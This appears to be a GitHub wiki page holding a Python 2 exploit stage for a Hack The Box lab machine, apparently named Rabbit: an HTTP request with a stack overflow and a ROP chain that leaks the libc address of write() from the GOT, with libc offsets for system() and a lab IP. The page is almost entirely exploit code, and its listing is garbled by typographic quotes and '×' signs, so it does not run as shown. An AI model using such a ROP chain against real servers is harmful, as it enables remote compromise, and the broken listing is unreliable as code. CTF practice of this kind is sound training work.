leak_write - adydawkins/htb-rabbit GitHub Wiki

#!/usr/bin/python
# Python 2 script (print statement, urllib.quote_plus): builds a ROP chain that
# makes the server call write() with the GOT entry of write() as the buffer, so
# the runtime libc address of write() is echoed back over the socket.
# NOTE: typographic quotes (‘ ’) and the "×" sign in place of "x" appear
# throughout the listing; they look like extraction/rendering artifacts and the
# text as shown does not parse as Python.
import os, sys, socket
import struct
from pwn import *
import urllib

# Target endpoint; the commented-out pair is the lab host used for the live run.
addr = (‘127.0.0.1’, 9999)
#addr = (‘10.10.10.89’, 1111)
# libc-relative offsets of read() and system(); only valid for the specific
# libc build on the target. Neither is used in this leak stage.
libcread_offset = 0xe8050
libcsystem_offset = 0×42510

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Stack filler up to the saved return address (568 bytes total, 5 of which are
# already supplied by the literal "\AAAA" prefix in the request line below).
payload = ‘’
payload += ’A’ * (568 -5) #total offset 568 – see socket.send [s.send(r’GET /\AAAA’……..

#leak address of write() in randomised libc
# All gadget/function addresses below are fixed constants, which presumably
# means the target binary is not position-independent — TODO confirm (PIE or a
# different build would invalidate every constant; stack canaries would stop
# the overwrite before the chain runs).
payload += p64(0×4011dd) #pop rdi; ret
payload += p64(0×4) #stdout # fd arg
# fd 4 is labelled "stdout" above, but stdout is fd 1; presumably this is the
# accepted client socket on the server side — verify before relying on it.
payload += p64(0×4011db) #pop rsi; pop r15; ret
payload += p64(0×603088) #write() in GOT
payload += p64(0xFF) #junk for r15
payload += p64(0×400c50) #write() call loc

s.connect(addr)
# Detection note: the request URI carries ~560 repeated bytes plus URL-encoded
# 8-byte little-endian addresses — an over-long request path with a repeated
# byte run is a signature a WAF / IDS rule on URI length and entropy can flag.
s.send(r’GET /\AAAA’+urllib.quote_plus(payload)’ ’r’HTTP/1.1’+’\n’+’Host: localhost:9999’+’\n’+’User-Agent: curl/7.60.0’+’\n’+’Accept: /‘+’\n’+’\n’+’\n’)

# First response chunk; the leaked write() address is expected to be in it.
print s.recv(1024)

# NOTE: `s.close` without parentheses only references the bound method and does
# not close the socket.
s.close
